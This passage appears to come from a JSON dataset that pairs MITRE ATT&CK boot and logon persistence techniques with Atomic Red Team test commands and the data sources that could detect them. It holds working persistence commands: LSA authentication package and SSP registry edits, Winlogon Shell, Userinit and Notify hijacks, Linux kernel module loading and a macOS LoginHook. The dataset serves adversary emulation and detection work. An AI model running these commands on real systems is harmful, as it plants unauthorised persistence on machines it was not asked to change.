"collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1547.002", + "command_list": [ + "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n" + ], + "commands": [ + { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", + "source": "atomics/T1547.002/T1547.002.yaml", + "name": "Atomic Red Team Test - Authentication Package" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.002", + "display_name": "Authentication Package", + "atomic_tests": [ + { + "name": "Authentication Package", + "auto_generated_guid": "be2590e8-4ac3-47ac-b4b5-945820f2fbe9", + "description": "Establishes persistence using a custom authentication package for the Local Security Authority (LSA).\nAfter a reboot, Notepad.exe will be executed as child process of lsass.exe.\nPayload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package\n[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Copy-Item $PathToAtomicsFolder\\T1547.002\\bin\\package.dll C:\\Windows\\System32\\\nreg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\\0package.dll\" /f\n", + "cleanup_command": "reg add \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\" /v \"Authentication Packages\" /t REG_MULTI_SZ /d \"msv1_0\" /f\nrm -force C:\\windows\\system32\\package.dll\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.004", + "command_list": [ + "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "New-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"C:\\Windows\\Temp\\atomicNotificationPackage.dll\" -Force\n" + ], + "commands": [ + { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + }, + { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, C:\\Windows\\System32\\cmd.exe\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + }, + { + "command": "New-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"C:\\Windows\\Temp\\atomicNotificationPackage.dll\" -Force\n", + "source": "atomics/T1547.004/T1547.004.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Winlogon Helper DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.004", + "display_name": "Boot or Logon Autostart Execution: Winlogon Helper DLL", + "atomic_tests": [ + { + "name": "Winlogon Shell Key Persistence - PowerShell", + "auto_generated_guid": "bf9f9d65-ee4d-4c3e-a843-777d04f19c38", + "description": "PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.\n\nUpon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of binary to execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Shell\" \"explorer.exe, #{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" -Name \"Shell\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Winlogon Userinit Key Persistence - PowerShell", + "auto_generated_guid": "fb32c935-ee2e-454b-8fa3-1c46b42e8dfb", + "description": "PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.\n\nUpon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of binary to execute", + "type": "Path", + "default": "C:\\Windows\\System32\\cmd.exe" + } + }, + "executor": { + "command": "Set-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" \"Userinit\" \"Userinit.exe, #{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\" -Name \"Userinit\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Winlogon Notify Key Logon Persistence - PowerShell", + "auto_generated_guid": "d40da266-e073-4e5a-bb8b-2b385023e5f9", + "description": "PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.\n\nUpon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon/logoff.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "binary_to_execute": { + "description": "Path of notification package to execute", + "type": "Path", + "default": "C:\\Windows\\Temp\\atomicNotificationPackage.dll" + } + }, + "executor": { + "command": "New-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force\nSet-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" \"logon\" \"#{binary_to_execute}\" -Force\n", + "cleanup_command": "Remove-Item \"HKCU:\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\" -Force -ErrorAction Ignore\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.005", + "command_list": [ + "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"not-a-ssp\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n" + ], + "commands": [ + { + "command": "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"not-a-ssp\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n", + "source": "atomics/T1547.005/T1547.005.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Security Support Provider" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.005", + "display_name": "Boot or Logon Autostart Execution: Security Support Provider", + "atomic_tests": [ + { + "name": "Modify SSP configuration in registry", + "auto_generated_guid": "afdfd7e3-8a0b-409f-85f7-886fdf249c9e", + "description": "Add a value to a Windows registry SSP key, simulating an adversarial modification of those keys.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "fake_ssp_dll": { + "description": "Value added to registry key. Normally refers to a DLL name in C:\\Windows\\System32.", + "type": "String", + "default": "not-a-ssp" + } + }, + "executor": { + "command": "# run these in sequence\n$SecurityPackages = Get-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' | Select-Object -ExpandProperty 'Security Packages'\n$SecurityPackagesUpdated = $SecurityPackages\n$SecurityPackagesUpdated += \"#{fake_ssp_dll}\"\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackagesUpdated\n\n# revert (before reboot)\nSet-ItemProperty HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Lsa -Name 'Security Packages' -Value $SecurityPackages\n", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.006", + "command_list": [ + "sudo insmod #{module_path}\n", + "sudo insmod /tmp/T1547.006/T1547006.ko\n" + ], + "commands": [ + { + "command": "sudo insmod #{module_path}\n", + "source": "atomics/T1547.006/T1547.006.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Kernel Modules and Extensions" + }, + { + "command": "sudo insmod /tmp/T1547.006/T1547006.ko\n", + "source": "atomics/T1547.006/T1547.006.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Kernel Modules and Extensions" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.006", + "display_name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions", + "atomic_tests": [ + { + "name": "Linux - Load Kernel Module via insmod", + "auto_generated_guid": "687dcb93-9656-4853-9c36-9977315e9d23", + "description": "This test uses the insmod command to load a kernel module for Linux.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "module_name": { + "description": "Name of the kernel module name.", + "type": "String", + "default": "T1547006" + }, + "module_path": { + "description": "Folder used to store the module.", + "type": "Path", + "default": "/tmp/T1547.006/T1547006.ko" + }, + "temp_folder": { + "description": "Temp folder used to compile the code.", + "type": "Path", + "default": "/tmp/T1547.006" + }, + "module_source_path": { + "description": "Path to download Gsecdump binary file", + "type": "Url", + "default": "PathToAtomicsFolder/T1547.006/src" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "The kernel module must exist on disk at specified location\n", + "prereq_command": "if [ -f #{module_path} ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ ! -d #{temp_folder} ]; then mkdir #{temp_folder}; touch #{temp_folder}/safe_to_delete; fi;\ncp #{module_source_path}/* #{temp_folder}/\ncd #{temp_folder}; make\nif [ ! -f #{module_path} ]; then mv #{temp_folder}/#{module_name}.ko #{module_path}; fi;\n" + } + ], + "executor": { + "command": "sudo insmod #{module_path}\n", + "cleanup_command": "sudo rmmod #{module_name}\n[ -f #{temp_folder}/safe_to_delete ] && rm -rf #{temp_folder}\n", + "name": "bash", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "kernel", + "definition": "Information associated with the operating system kernel of a host.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS" + ], + "data_component": "kernel module load", + "description": "A kernel module was loaded on a host.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "kernel module" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383", + "https://man7.org/linux/man-pages/man2/init_module.2.html" + ] + ] + }, + { + "technique_id": "T1547.007", + "command_list": [ + "sudo defaults write com.apple.loginwindow LoginHook /path/to/script\n" + ], + "commands": [ + { + "command": "sudo defaults write com.apple.loginwindow LoginHook /path/to/script\n", + "source": "atomics/T1547.007/T1547.007.yaml", + "name": "Atomic Red Team Test - Boot or Logon Autostart Execution: Re-opened Applications" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1547.007", + "display_name": "Boot or Logon Autostart Execution: Re-opened Applications", + "atomic_tests": [ + { + "name": "Re-Opened Applications", + "auto_generated_guid": "5fefd767-ef54-4ac6-84d3-751ab85e8aba", + "description": "Plist Method\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "steps": "1. create a custom plist:\n\n ~/Library/Preferences/com.apple.loginwindow.plist\n\nor\n\n ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist\n", + "name": "manual" + } + }, + { + "name": "Re-Opened Applications", + "auto_generated_guid": "5f5b71da-e03f-42e7-ac98-d63f9e0465cb", + "description": "Mac Defaults\n\n[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "script": { + "description": "path to script", + "type": "Path", + "default": "/path/to/script" + } + }, + "executor": { + "command": "sudo defaults write com.apple.loginwindow LoginHook #{script}\n", + "cleanup_command": "sudo defaults delete com.apple.loginwindow LoginHook\n", + "elevation_required": true, + "name": "sh" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1547.009", + "command_list": [ + "echo [InternetShortcut] > %temp%\\T1547.009_modified_shortcut.url\necho URL=C:\\windows\\system32\\calc.exe >> %temp%\\T1547.009_modified_shortcut.url\n%temp%\\T1547.009_modified_shortcut.url\n", + "$Shell = New-Object -ComObject (\"WScript.Shell\")\n$ShortCut = $Shell.CreateShortcut(\"$env:APPDATA\\Microsoft\\Windows\\Start 